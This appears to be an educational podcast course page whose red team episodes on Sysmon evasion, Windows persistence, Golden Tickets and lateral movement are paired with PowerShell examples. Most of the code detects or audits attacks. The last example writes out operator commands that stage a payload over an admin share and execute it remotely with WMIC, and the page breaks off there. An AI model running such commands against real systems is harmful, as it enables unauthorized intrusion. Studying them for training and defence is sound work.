CyberCode Academy

Welcome to CyberCode Academy — your audio classroom for Programming and Cybersecurity. 🎧 Each course is divided into a series of short, focused episodes that take you from beginner to advanced level — one lesson at a time. From Python and web development to ethical hacking and digital defense, our content transforms complex concepts into simple, engaging audio learning. Study anywhere, anytime — and level up your skills with CyberCode Academy. 🚀 Learn. Code. Secure.

  1. Course 17 - Computer Network Security Protocols And Techniques | Episode 1: Computer Network Security: Foundations, Core Aspects

    20 hours ago

    Course 17 - Computer Network Security Protocols And Techniques | Episode 1: Computer Network Security: Foundations, Core Aspects

    In this lesson, you’ll learn about:
    - The fundamental goals of computer network security
    - The four core security properties used to protect network communications
    - The classic security model involving Alice, Bob, and Eve
    - Common threat behaviors observed in insecure communication channels

    Introduction
    This lesson introduces the foundations of computer network security by explaining its core objectives and the main actors involved in secure and insecure communications. To simplify complex security concepts, a widely used abstract model is employed, featuring Alice, Bob, and Eve. This model helps students understand how legitimate communication works, how it can be attacked, and why security mechanisms are necessary.

    Core Aspects of Network Security
    Computer network security focuses on protecting information as it is exchanged between interconnected systems. It is built upon four fundamental aspects:

    1. Confidentiality
    Confidentiality ensures that information remains private. If a sender encrypts a message, only the intended recipient should be able to decrypt and read it. Unauthorized parties should gain no meaningful information, even if they intercept the data.

    2. Authentication
    Authentication verifies the identities of communicating parties. Both the sender and receiver must confirm who they are communicating with. This prevents attackers from pretending to be trusted users or systems.

    3. Message Integrity (Message Authentication)
    Message integrity ensures that transmitted data has not been altered. The receiver must be able to detect any modification, insertion, or deletion of data in transit. Encryption alone does not provide this: a ciphertext can be changed so that it decrypts to a different message, so integrity needs its own mechanism (a MAC, or an authenticated encryption mode that includes one).

    4. Access and Availability
    Availability ensures that network services remain usable. Legitimate users must be able to access systems and services when needed, and security mechanisms should protect against disruptions that prevent normal operation.

    The Security Actors: Alice, Bob, and Eve
    To explain security threats clearly, network security often uses three symbolic characters:

    Alice and Bob
    - Represent legitimate and trusted entities.
    - They may be real users, applications, network devices, or servers.
    - Their goal is to communicate securely and reliably.
    Examples include:
    - A user accessing an online banking service
    - Two routers exchanging routing information
    - A client communicating with a web server

    Eve
    - Represents the adversary or intruder.
    - Eve is not a specific person, but a model for any malicious entity attempting to interfere with communication.

    Common Attacks Performed by Eve
    Eve can attempt several types of attacks on the communication channel between Alice and Bob:

    Interception and Eavesdropping
    - Eve listens to the communication to obtain confidential information.
    - This violates confidentiality.

    Message Manipulation
    - Eve intercepts messages and modifies their contents.
    - She may delete messages or inject new, fake ones.
    - This breaks message integrity.

    Man-in-the-Middle (Hijacking)
    - Eve positions herself between Alice and Bob.
    - All communication passes through Eve without their knowledge.
    - Eve can read, modify, or redirect messages freely.

    Impersonation and Spoofing
    - Eve pretends to be Alice when communicating with Bob.
    - Bob believes the messages originate from Alice, even though they do not.
    - This undermines authentication.

    Denial of Service (DoS) Attacks
    - Eve overwhelms Bob with excessive requests, often from spoofed source addresses so the traffic cannot simply be blocked by sender.
    - Bob becomes unable to respond to legitimate requests from Alice.
    - This violates availability.

    Key Educational Takeaways
    - Network security exists to protect confidentiality, integrity, authentication, and availability
    - Legitimate communication must be protected from interception and manipulation
    - Attackers exploit weaknesses in trust, identity, and visibility
    - The Alice–Bob–Eve model provides a simple but powerful way to analyze security threats
    - Understanding attacker behavior is essential for designing effective defenses

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
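    The gap between confidentiality and message integrity described above, as an added worked example that is not part of the episode: Alice encrypts a transfer instruction for Bob, Eve flips a few ciphertext bits on the wire, and Bob decrypts a different amount without noticing, until a message authentication code is checked first. The XOR keystream cipher, the key strings and the message are constructed for this demonstration only; a real system would use an authenticated mode such as AES-GCM.

```powershell
# Added example; not part of the episode. A toy XOR keystream cipher makes the
# malleability attack visible (real systems use an authenticated mode such as
# AES-GCM). Keys and the message are constructed for this demonstration.
$enc = [System.Text.Encoding]::ASCII

function Get-Keystream {
    # Toy keystream: SHA-256(key || counter) blocks, concatenated to the requested length.
    param([byte[]]$Key, [int]$Length)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $out = New-Object System.Collections.Generic.List[byte]
    $counter = 0
    while ($out.Count -lt $Length) {
        $block = $sha.ComputeHash([byte[]]($Key + [System.BitConverter]::GetBytes($counter)))
        $out.AddRange($block)
        $counter++
    }
    return $out.GetRange(0, $Length).ToArray()
}

function Protect-Message {
    # XOR with the keystream; the same call encrypts and decrypts.
    param([byte[]]$Key, [byte[]]$Data)
    $ks = Get-Keystream -Key $Key -Length $Data.Length
    $result = [byte[]]::new($Data.Length)
    for ($i = 0; $i -lt $Data.Length; $i++) { $result[$i] = $Data[$i] -bxor $ks[$i] }
    return $result
}

function Get-Tag {
    # Message authentication: HMAC-SHA256 over the ciphertext (encrypt-then-MAC).
    param([byte[]]$MacKey, [byte[]]$Ciphertext)
    $hmac = [System.Security.Cryptography.HMACSHA256]::new($MacKey)
    return $hmac.ComputeHash($Ciphertext)
}

function Test-Tag {
    # Bob recomputes the tag and compares in constant time, so Eve learns nothing from timing.
    param([byte[]]$MacKey, [byte[]]$Ciphertext, [byte[]]$Tag)
    $expected = Get-Tag -MacKey $MacKey -Ciphertext $Ciphertext
    if ($Tag.Length -ne $expected.Length) { return $false }
    $diff = 0
    for ($i = 0; $i -lt $expected.Length; $i++) { $diff = $diff -bor ($expected[$i] -bxor $Tag[$i]) }
    return ($diff -eq 0)
}

# Alice -> Bob. Keys are shared out of band; constructed values for the example.
$encKey = $enc.GetBytes('alice-bob-shared-encryption-key')
$macKey = $enc.GetBytes('alice-bob-shared-mac-key')
$plain  = $enc.GetBytes('PAY 100 TO ACCT 42')
$ct     = Protect-Message -Key $encKey -Data $plain
$tag    = Get-Tag -MacKey $macKey -Ciphertext $ct

# Eve intercepts. She cannot read the message but knows its format. In an XOR
# cipher, flipping ciphertext bits flips the same plaintext bits: XOR-ing
# position 4 with ('1' xor '9') turns the '1' of "100" into '9'.
$tampered = [byte[]]($ct.Clone())
$tampered[4] = $tampered[4] -bxor ([byte][char]'1' -bxor [byte][char]'9')

# Bob, confidentiality only: decrypts and acts on whatever comes out.
$bobReads = $enc.GetString([byte[]](Protect-Message -Key $encKey -Data $tampered))
"Without an integrity check Bob reads: $bobReads"

# Bob, with message authentication: the tag no longer matches the received ciphertext.
"Tampered message accepted: " + (Test-Tag -MacKey $macKey -Ciphertext $tampered -Tag $tag)
"Original message accepted: " + (Test-Tag -MacKey $macKey -Ciphertext $ct -Tag $tag)
```

    Runs in Windows PowerShell 5.1 or PowerShell 7. The decrypted tampered message carries a different amount while the tag check rejects it and accepts the original, which is exactly the distinction between confidentiality and message authentication the lesson draws: Eve never learned the key, yet she changed what Bob read.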

    10 minutes
  2. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 7: The Art of Evasion: Detecting and Bypassing Security with Sysmon

    1 day ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 7: The Art of Evasion: Detecting and Bypassing Security with Sysmon

    In this lesson, you’ll learn about:
    - The adversarial relationship between red teams and blue teams
    - Core evasion philosophies used during red team engagements
    - How host-based monitoring tools like Sysmon detect attacker behavior
    - Common indicators defenders rely on to identify malicious activity
    - Why understanding detection tools is essential for both attackers and defenders

    Overview
    This lesson explores the cybersecurity “cat and mouse game” between red teamers and blue teamers. It focuses on how attackers attempt to remain stealthy, while defenders deploy monitoring tools to detect abnormal behavior. The episode moves from evasion theory to a conceptual examination of Sysmon, a widely used Windows system monitoring utility from the Sysinternals suite, demonstrating how detection works and how sophisticated attackers attempt to bypass it during authorized security assessments. The goal is not exploitation, but understanding limitations, detection gaps, and defensive improvements.

    1. The Red Team Mindset: Evasion and Blending In
    A red teamer’s objective during an engagement is not chaos, but persistence without detection. Once detected, access is often lost, limiting the value of the assessment.

    Environmental Awareness
    Effective operators must understand:
    - What security controls are present
    - How those controls collect data
    - What behaviors are considered “normal” in the environment
    Evasion decisions are based on this awareness, not randomness.

    Primary Evasion Strategies
    1. Disabling Defenses
    - A direct but noisy approach
    - Immediately disrupts security visibility
    - Often triggers alerts and manual investigation
    Risk: while effective short-term, it almost guarantees defender awareness. Stopping the Sysmon service is itself recorded (Sysmon Event ID 4, service state changed), and a host that suddenly stops sending events stands out on a well-run SIEM.

    2. Blending In
    - Mimicking legitimate user or system behavior
    - Using common protocols and expected execution patterns
    - Aligning malicious activity with typical system workflows
    Strength: reduces the behavioral anomalies that monitoring tools flag.

    3. Targeting Unwatched Areas
    - Identifying security blind spots
    - Leveraging exclusions or limited logging scopes
    - Operating where visibility is weakest
    Reality: no monitoring solution observes everything equally. A Sysmon configuration is a list of include and exclude rules, and anything excluded for noise reduction is never written to the log.

    2. The Blue Team Perspective: Detection with Sysmon
    What Sysmon Does
    Sysmon is a host-based monitoring tool that writes detailed events to the Microsoft-Windows-Sysmon/Operational log, including:
    - Process creation with full command line, hashes, and the parent-child relationship (Event ID 1)
    - Network connections tied to the originating process (Event ID 3)
    - Registry modifications (Event IDs 12 to 14)
    - File creation (Event ID 11) and WMI subscription activity (Event IDs 19 to 21)
    It does not block attacks; it records evidence for an analyst or SIEM to act on.

    Common Indicators Defenders Look For
    During the demonstration, Sysmon reveals attacker behavior through patterns such as:
    - Unusual executables placed in sensitive system directories
    - Randomized file names that do not match known software
    - Suspicious process chains, where core system processes launch unexpected children
    - Outbound network activity from processes that normally should not communicate externally
    Detection relies less on a single event and more on correlation.

    3. Counter-Evasion: Understanding the Limits of Monitoring
    Advanced red teamers study defensive tools not to destroy them, but to understand their coverage.

    Why This Matters
    Security tools:
    - Operate based on configuration
    - Have exclusions for performance and noise reduction
    - Can be misconfigured or incomplete
    By understanding what is logged versus what is ignored, operators can predict detection likelihood.

    Key Defensive Lesson
    Even when a monitoring tool appears active:
    - Logging may be incomplete
    - Visibility may be conditional
    - Drivers and data sources may be disabled independently
    This reinforces why defenders must:
    - Verify that events are actually arriving, not merely that the service is installed
    - Monitor the monitoring tools themselves (Sysmon Event ID 16 records configuration changes, Event ID 4 records service state changes)
    - Avoid assuming visibility equals coverage

    4. The Real Battle: Creativity and Understanding
    Neither red teams nor blue teams rely solely on tools.
    - Red teams rely on understanding system behavior
    - Blue teams rely on pattern recognition and context
    - Tools amplify skill, but do not replace it
    The effectiveness of both sides depends on:
    - Knowledge of operating systems
    - Awareness of tooling limitations
    - The ability to think beyond default assumptions

    Educational Analogy: Understanding Evasion
    Imagine a red teamer as a burglar testing a secured building:
    - Disabling defenses is cutting the power: effective, but instantly suspicious
    - Blending in is wearing staff clothing and acting normal
    - Using blind spots is entering where cameras don’t fully cover
    Security failures aren’t always due to broken locks, but to unwatched angles.

    Key Ethical Takeaways
    - Evasion techniques exist to test detection, not to evade accountability
    - Monitoring tools are powerful but not omniscient
    - Detection is about behavior, not signatures alone
    - Understanding attacker evasion improves defensive design
    - Ethical training focuses on awareness, validation, and improvement

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
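    The four indicators listed under “Common Indicators Defenders Look For”, and the point that detection comes from correlating them rather than from any single event, as an added example that is not code from the episode. The Sysmon-style records are constructed (invented GUIDs, paths, user name and IP addresses); the ConvertFrom-SysmonEvent helper shows how live Sysmon events would be mapped into the same shape. The thresholds and the allow/deny lists are judgement calls made for this example.

```powershell
# Added example; not from the episode. Constructed Sysmon-style records
# (Event ID 1 = ProcessCreate, Event ID 3 = NetworkConnect) stand in for
# live Get-WinEvent output so the rules run offline. GUIDs, paths, user
# name and IP addresses are invented for the sample.
$events = @(
    [pscustomobject]@{ Id=1; ProcessGuid='{A}'; Image='C:\Windows\System32\svchost.exe'
                       ParentImage='C:\Windows\System32\services.exe'; DestinationIp=$null }
    [pscustomobject]@{ Id=1; ProcessGuid='{B}'; Image='C:\Users\jsmith\AppData\Local\Temp\x7k2q9pz.exe'
                       ParentImage='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; DestinationIp=$null }
    [pscustomobject]@{ Id=3; ProcessGuid='{B}'; Image='C:\Users\jsmith\AppData\Local\Temp\x7k2q9pz.exe'
                       ParentImage=$null; DestinationIp='203.0.113.10' }
    [pscustomobject]@{ Id=1; ProcessGuid='{C}'; Image='C:\Windows\System32\cmd.exe'
                       ParentImage='C:\Windows\explorer.exe'; DestinationIp=$null }
    [pscustomobject]@{ Id=3; ProcessGuid='{D}'; Image='C:\Windows\System32\notepad.exe'
                       ParentImage=$null; DestinationIp='198.51.100.7' }
)

function ConvertFrom-SysmonEvent {
    # Maps a live record to the sample's shape. On a real host:
    #   Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' `
    #       -FilterXPath '*[System[EventID=1 or EventID=3]]' | ForEach-Object { ConvertFrom-SysmonEvent $_ }
    param($Record)
    $data = @{}
    foreach ($d in ([xml]$Record.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{ Id=$Record.Id; ProcessGuid=$data['ProcessGuid']; Image=$data['Image']
                       ParentImage=$data['ParentImage']; DestinationIp=$data['DestinationIp'] }
}

# Lists chosen for this example; tune them to the environment's baseline.
$docHandlers  = 'WINWORD.EXE','EXCEL.EXE','POWERPNT.EXE','OUTLOOK.EXE','AcroRd32.exe'
$noNetwork    = 'notepad.exe','calc.exe','mspaint.exe','write.exe'
$userWritable = '\\Temp\\','\\AppData\\','\\Users\\Public\\','\\ProgramData\\'

function Get-Indicators {
    # Returns zero or more indicator strings for one event.
    param($Event)
    $name      = [System.IO.Path]::GetFileName($Event.Image)
    $parent    = if ($Event.ParentImage) { [System.IO.Path]::GetFileName($Event.ParentImage) } else { '' }
    $inUserDir = [bool]($userWritable | Where-Object { $Event.Image -match $_ })
    $hits = @()
    switch ($Event.Id) {
        1 {
            # A document handler should render documents, not launch programs.
            if ($docHandlers -contains $parent) { $hits += "doc-handler-spawned-child:$parent->$name" }
            # Short, digit-bearing names in user-writable paths rarely belong to packaged software.
            if ($inUserDir -and $name -match '^[a-z0-9]{6,12}\.exe$' -and $name -match '\d') {
                $hits += "random-name-in-user-dir:$($Event.Image)"
            }
        }
        3 {
            if ($noNetwork -contains $name) { $hits += "unexpected-network:$name->$($Event.DestinationIp)" }
            if ($inUserDir) { $hits += "network-from-user-dir:$name->$($Event.DestinationIp)" }
        }
    }
    return $hits
}

# Correlate by ProcessGuid: one weak indicator is noise, two or more on the same process is an alert.
$scores = @{}
foreach ($e in $events) {
    foreach ($hit in @(Get-Indicators $e)) {
        if (-not $scores.ContainsKey($e.ProcessGuid)) {
            $scores[$e.ProcessGuid] = New-Object System.Collections.Generic.List[string]
        }
        $scores[$e.ProcessGuid].Add($hit)
    }
}
foreach ($guid in $scores.Keys) {
    $severity = if ($scores[$guid].Count -ge 2) { 'ALERT' } else { 'info' }
    '[{0}] {1}: {2}' -f $severity, $guid, ($scores[$guid] -join ' | ')
}
```

    In the sample, process {B} accumulates three indicators (an Office parent, a random-looking name in a Temp directory, and an outbound connection from that directory) and is reported as an alert, while notepad.exe’s single connection is reported as information only. That is the correlation point of the lesson: each rule on its own would either miss real activity or drown the analyst, and the same rules applied to a real Sysmon log through ConvertFrom-SysmonEvent are only as good as what the Sysmon configuration chose to record.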

    14 minutes
  3. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 6: Windows Persistence Strategies: Registry, Scheduled Tasks, Services, WMI

    2 days ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 6: Windows Persistence Strategies: Registry, Scheduled Tasks, Services, WMI

    In this lesson, you’ll learn about:
    - The purpose of persistence in red team operations
    - Common local Windows persistence mechanisms and how they function
    - Event-driven persistence using WMI
    - The difference between host-level and domain-level persistence
    - Why Kerberos Golden Tickets represent a critical enterprise risk

    Overview
    This lesson provides a comprehensive technical explanation of Windows persistence strategies, focusing on how attackers maintain long-term access after an initial compromise. Persistence is a post-exploitation objective that ensures access survives:
    - System reboots
    - User logouts
    - Password changes
    - Partial remediation efforts
    All techniques discussed are framed within authorized red team engagements, defensive awareness training, and detection engineering contexts.

    1. Local System Persistence Techniques
    Local persistence mechanisms ensure continued execution of malicious code on a single compromised host.

    1.1 Registry Run Keys
    Concept: Windows supports registry keys that automatically launch applications when users log in.
    How It Works
    - A startup entry is added under HKLM\Software\Microsoft\Windows\CurrentVersion\Run (fires for every user, requires administrative rights to write) or the HKCU equivalent (current user only)
    - The payload executes whenever a matching user logs in
    - The method survives reboots and user changes
    Why It’s Effective
    - Simple and reliable
    - Commonly abused by malware
    - Often overlooked during basic incident response
    Defensive Insight: security teams should monitor:
    - Startup registry locations (Sysmon Event IDs 12 and 13 capture writes to them)
    - Unsigned or unusual binaries referenced by run keys

    1.2 Scheduled Tasks
    Concept: Scheduled Tasks allow programs to execute automatically based on time or system conditions.
    How It Works
    - A background task is created to run repeatedly
    - Execution can be time-based or event-based
    - The task operates independently of user interaction
    Why It’s Effective
    - Blends in with legitimate administrative activity
    - Can execute frequently to re-establish access
    - Flexible timing and execution context
    Defensive Insight: blue teams should audit:
    - Newly created or modified tasks (Security Event ID 4698 records task creation when object access auditing for scheduled tasks is enabled)
    - Tasks executing from unusual directories

    1.3 Windows Services (SCM)
    Concept: Windows services start automatically when the system boots and typically run with elevated privileges.
    How It Works
    - A service is configured to launch at startup
    - Execution occurs before user login
    - Often runs with SYSTEM-level permissions
    Why It’s Effective
    - Highly persistent
    - Very powerful privilege context
    - Survives reboots consistently
    Defensive Insight: detection should focus on:
    - New or modified services (System Event ID 7045 records every service installation)
    - Services running unsigned or unexpected executables

    1.4 WMI Event Subscriptions (Advanced Persistence)
    Concept: Windows Management Instrumentation (WMI) supports event-driven automation, which can be abused for stealthy persistence.
    Architecture
    WMI persistence consists of three objects stored in the root\subscription namespace:
    - Event Filter (__EventFilter): a WQL query that watches for a specific system condition
    - Consumer (for example CommandLineEventConsumer or ActiveScriptEventConsumer): defines the action to perform
    - Binding (__FilterToConsumerBinding): connects the filter to the consumer
    Why It’s Effective
    - No visible startup entries
    - No scheduled tasks or services
    - Triggers only when specific events occur
    Defensive Insight: this is one of the hardest techniques to detect. Monitoring requires:
    - WMI repository inspection (enumerating the three classes above)
    - Event subscription auditing (Sysmon Event IDs 19, 20 and 21 record filter, consumer and binding creation)
    - Behavioral correlation

    2. Domain-Level Persistence: Golden Tickets
    Concept: Golden Tickets abuse Kerberos authentication to provide long-lived, domain-wide access.
    How It Works (High-Level)
    - The password hash of the domain’s krbtgt account, the key that signs every Ticket Granting Ticket, is obtained, typically from a domain controller or a copy of its database
    - A TGT is forged offline with that key
    - The forged ticket asserts Domain Admin group membership for any chosen identity, with whatever lifetime the attacker sets
    Why This Is Critical
    Access persists even if:
    - Passwords are reset (other than the krbtgt password itself)
    - Accounts are disabled
    - Administrators are removed
    The attacker can generate new valid tickets at will.
    Impact
    This technique effectively gives an attacker:
    - Unlimited access to the domain
    - Full control over users, systems, and policies
    - A near-undetectable persistence mechanism if not monitored
    Defensive Insight: mitigation requires:
    - Resetting the krbtgt password twice after any suspected domain controller compromise, allowing replication between the resets; the KDC still honours tickets signed with the previous key, so a single reset is not enough
    - Monitoring authentication anomalies, for example a service ticket request (Event ID 4769) for an account with no preceding TGT request (Event ID 4768) on any domain controller, or ticket lifetimes and encryption types that do not match domain policy
    - Implementing strong domain hygiene and detection tooling

    Host vs Domain Persistence Comparison
    Persistence Type      Scope          Risk Level
    Registry / Tasks      Single host    Medium
    Services              Single host    High
    WMI Subscriptions     Single host    High (stealthy)
    Golden Tickets        Entire domain  Critical

    Why Persistence Matters in Red Teaming
    Persistence is not about destruction; it is about testing resilience. Professional red teams use persistence to:
    - Measure detection and response maturity
    - Test cleanup effectiveness
    - Identify gaps in monitoring
    - Improve blue team readiness
    Every persistence mechanism must also include a clean removal path.

    Conceptual Analogy
    Think of persistence as hiding spare access keys:
    - Registry & Services: a key hidden where you check every day
    - Scheduled Tasks: a door that unlocks automatically on a timer
    - WMI Subscriptions: a smart sensor that opens the door only under specific conditions
    - Golden Tickets: access to the locksmith’s master system that can mint new keys on demand
    Some keys affect one door. Others open the entire city.

    Key Educational Takeaways
    - Persistence is a post-exploitation objective, not an exploit
    - Simpler methods are more common, advanced methods are stealthier
    - Domain-level persistence is far more dangerous than host-level persistence
    - Detection is possible, but requires deep visibility
    - Ethical red team operations prioritize documentation and cleanup

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
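    The “Defensive Insight” items for the four local mechanisms above, turned into one read-only triage script. This is an added example, not code from the episode: it enumerates run keys, scheduled task actions, auto-start services and WMI filter-to-consumer bindings on the host it runs on, and flags binaries outside the Windows and Program Files trees or without a valid Authenticode signature. The notion of “trusted roots” and the decision to list every WMI binding are assumptions made for this example.

```powershell
# Added example; not from the episode. Read-only triage of the four local
# persistence locations the lesson describes. Run from an elevated PowerShell
# on the host under review; nothing is modified. "Trusted roots" is a
# judgement call made for this example.
$trustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\") |
    Where-Object { $_.Length -gt 1 }    # drops the empty entry on hosts without a 32-bit Program Files

function Get-ExePath {
    # Extracts the executable from a command line such as  "C:\a b\x.exe" /q  or  C:\a\x.exe /q
    param([string]$CommandLine)
    if (-not $CommandLine) { return $null }
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($CommandLine.Trim() -split '\s+')[0]
}

function Test-Suspicious {
    # True when the binary lives outside the trusted roots or lacks a valid Authenticode signature.
    param([string]$Path)
    if (-not $Path) { return $false }
    $expanded = [Environment]::ExpandEnvironmentVariables($Path)
    if ($expanded -notmatch '[\\/]') {                      # bare name such as powershell.exe: resolve via PATH
        $cmd = Get-Command $expanded -ErrorAction SilentlyContinue
        if ($cmd) { $expanded = $cmd.Source }
    }
    $inTrusted = [bool]($trustedRoots | Where-Object { $expanded -like "$_*" })
    $sigStatus = if (Test-Path -LiteralPath $expanded) { (Get-AuthenticodeSignature -FilePath $expanded).Status } else { 'Missing' }
    return (-not $inTrusted) -or ($sigStatus -ne 'Valid')
}

$findings = @()

# 1. Registry run keys. HKLM fires for every user at logon, HKCU only for the current one.
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$findings += @(foreach ($key in $runKeys | Where-Object { Test-Path $_ }) {
    $props = Get-ItemProperty -Path $key
    foreach ($valueName in $props.PSObject.Properties.Name | Where-Object { $_ -notlike 'PS*' }) {
        if (Test-Suspicious (Get-ExePath $props.$valueName)) {
            [pscustomobject]@{ Type='RunKey'; Where="$key\$valueName"; Command=$props.$valueName }
        }
    }
})

# 2. Scheduled tasks whose action runs an untrusted or unsigned binary.
$findings += @(foreach ($task in Get-ScheduledTask | Where-Object State -ne 'Disabled') {
    foreach ($action in $task.Actions) {
        if ($action.Execute -and (Test-Suspicious (Get-ExePath $action.Execute))) {
            [pscustomobject]@{ Type='Task'; Where="$($task.TaskPath)$($task.TaskName)"; Command="$($action.Execute) $($action.Arguments)" }
        }
    }
})

# 3. Auto-start services (run before logon, usually as SYSTEM).
$findings += @(foreach ($svc in Get-CimInstance Win32_Service | Where-Object StartMode -eq 'Auto') {
    if (Test-Suspicious (Get-ExePath $svc.PathName)) {
        [pscustomobject]@{ Type='Service'; Where="$($svc.Name) as $($svc.StartName)"; Command=$svc.PathName }
    }
})

# 4. WMI subscriptions: every filter -> consumer binding is listed for review, since a clean
#    host carries only the few that Windows installs itself (e.g. the SCM Event Log Consumer).
$filters   = Get-CimInstance -Namespace root\subscription -ClassName __EventFilter
$consumers = Get-CimInstance -Namespace root\subscription -ClassName __EventConsumer
$findings += @(foreach ($b in Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding) {
    $fName = if ("$($b.Filter)"   -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] }
    $cName = if ("$($b.Consumer)" -match 'Name\s*=\s*"([^"]+)"') { $Matches[1] }
    $f = $filters   | Where-Object Name -eq $fName
    $c = $consumers | Where-Object Name -eq $cName
    [pscustomobject]@{ Type='WmiBinding'; Where="$fName -> $cName ($($c.CimClass.CimClassName))"
                       Command="$($f.Query) => $($c.CommandLineTemplate)$($c.ScriptText)" }
})

$findings | Format-Table Type, Where, Command -AutoSize -Wrap
```

    Reading the root\subscription namespace needs administrative rights, which is why the script asks for an elevated session. Expect some noise: third-party software installed outside Program Files is reported, and so is a service whose unquoted path contains spaces (Get-ExePath then truncates it at the first space and the file is reported as missing), which is itself a misconfiguration worth fixing. Run the script once on a known-good build to capture a baseline and diff later runs against it rather than reading the full list every time.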

    11 minutes
  4. Course 16 - Red Team Ethical Hacking Beginner Course | Episode 5: Windows Lateral Movement: Manual Execution via WMIC, Scheduled Tasks

    3 days ago

    Course 16 - Red Team Ethical Hacking Beginner Course | Episode 5: Windows Lateral Movement: Manual Execution via WMIC, Scheduled Tasks

    In this lesson, you’ll learn about:
    - The purpose of manual lateral movement in red team operations
    - Why native Windows utilities are critical for stealth and reliability
    - Three core lateral movement methodologies used in authorized engagements
    - Privilege context differences between execution methods
    - How these techniques relate to common automated tools

    Overview
    This lesson delivers a technical deep dive into manual lateral movement within Windows domain environments. Lateral movement refers to the ability to pivot from one compromised system to another after obtaining elevated credentials, most commonly domain administrative access. Rather than relying on automated frameworks, this episode emphasizes manual techniques using native Windows functionality, which are:
    - Less noisy
    - More flexible
    - Harder to detect when used responsibly in controlled testing
    All techniques discussed assume explicit authorization, proper scoping, and a professional red team context.

    1. Lateral Movement Using WMIC
    Concept: WMIC (the Windows Management Instrumentation command-line utility) lets administrators act on remote systems through WMI, which travels over DCOM (TCP 135 plus a dynamically assigned port). WMIC is deprecated and is no longer installed by default on current Windows 11 builds; the same WMI call is available through PowerShell’s Invoke-CimMethod against the Win32_Process class.
    Methodology
    - The operator targets a remote host by explicitly specifying it (the /node: switch)
    - Remote interaction is used to:
      - Validate access
      - Confirm file placement
      - Trigger execution of an existing payload
    Key Characteristics
    - Requires administrative privileges on the target
    - Execution occurs under the credential context of the initiating user
    - Commonly used for:
      - Quick pivots
      - Testing administrative access
      - Lightweight remote execution
    Operational Insight: this method is simple and effective but does not grant SYSTEM-level access. The remote process is spawned by the WMI provider host (WmiPrvSE.exe) and inherits the privileges of the domain admin account used; that parent-child relationship is also what defenders look for.

    2. Lateral Movement Using Scheduled Tasks
    Concept: Windows Scheduled Tasks provide a mechanism to execute actions on remote systems at defined times or conditions.
    Methodology
    - A payload is staged on the target system
    - A task is created remotely with:
      - A one-time execution
      - Immediate triggering behavior
      - Execution configured under a high-privilege account
    Key Characteristics
    - Can execute under NT AUTHORITY\SYSTEM
    - Yields local SYSTEM on the target, a different context from the domain admin token that WMIC execution inherits and the highest privilege available on that host
    - The “run once” approach prevents repeated execution
    Operational Insight: this technique is widely used in red team engagements because it:
    - Mimics legitimate administrative behavior
    - Blends into system management activity
    - Provides strong control over execution timing

    3. Lateral Movement Using Service Control Manager (SCM)
    Concept: The Service Control Manager manages Windows services, which inherently run with elevated privileges.
    Methodology
    - A service-compatible executable is required: the binary must implement the service control handshake, otherwise the SCM terminates it when the start timeout expires (error 1053)
    - The payload is registered as a new service on the target
    - Starting the service triggers execution automatically
    Key Characteristics
    - Executes as SYSTEM by default
    - Explains the mechanics behind tools like PsExec, which installs a temporary service (PSEXESVC) in exactly this way
    - Requires careful payload preparation due to service constraints
    Operational Insight: because services are tightly integrated with Windows internals, this method is:
    - Extremely powerful
    - Highly privileged
    - More detectable if not carefully managed (every installation is written to the System log as Event ID 7045)
    Professional red teamers use this method sparingly and responsibly.

    Privilege Context Comparison
    Method            Privilege Level   Key Use Case
    WMIC              Domain Admin      Fast pivot, low complexity
    Scheduled Tasks   SYSTEM            Privilege escalation, persistence
    SCM               SYSTEM            Service-based execution, tool emulation

    Why Manual Lateral Movement Matters
    Automated tools abstract these techniques, and detections are usually written against the tools’ artifacts rather than the underlying concepts. Understanding manual execution:
    - Improves adaptability
    - Enables stealthier operations
    - Allows red teamers to troubleshoot automated failures
    - Strengthens blue team detection engineering

    Conceptual Analogy
    Imagine having the master key to a secured facility:
    - WMIC is like using the internal intercom to instruct a specific room to start a task
    - Scheduled Tasks is like setting a high-priority automated instruction that executes instantly
    - SCM is like installing new maintenance equipment that always runs with full facility authority
    Each method achieves access, but with different levels of control and visibility.

    Key Educational Takeaways
    - Lateral movement depends on credentials, not exploits
    - Native Windows tools are powerful and flexible
    - Privilege context matters more than execution success
    - Manual techniques explain how automated tools work
    - Professional engagements require precision, restraint, and cleanup

    You can listen and download our episodes for free on more than 10 different platforms: https://linktr.ee/cybercode_academy
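    The three execution paths above as the operator would type them into a PowerShell session during an authorized engagement, including the cleanup the lesson insists on. This is an added example, not commands from the episode. The target host name (WS01), the payload path and the task and service names are placeholders; the session is assumed to already hold domain-admin credentials, and svc_check.exe is assumed to be a service-compatible binary so that method 3 does not hit the start timeout.

```powershell
# Added example; not from the episode. The three native execution paths the
# lesson describes, as typed in a PowerShell session that already holds
# domain-admin credentials during an authorized engagement. Host name, payload
# path and task/service names are placeholders; svc_check.exe is assumed to be
# a service-compatible binary for method 3.
$target  = 'WS01'
$payload = 'C:\Windows\Temp\svc_check.exe'

# Stage the binary over the admin share (SMB, TCP 445); all three methods run it from there.
Copy-Item -Path .\svc_check.exe -Destination "\\$target\C$\Windows\Temp\svc_check.exe"

# 1. WMIC over DCOM. Runs in the caller's token (domain admin); the remote parent is WmiPrvSE.exe.
#    Only ProcessId and ReturnValue come back (0 = started); the program's output stays on the target.
wmic /node:$target process call create $payload
#    Same WMI call without the deprecated utility:
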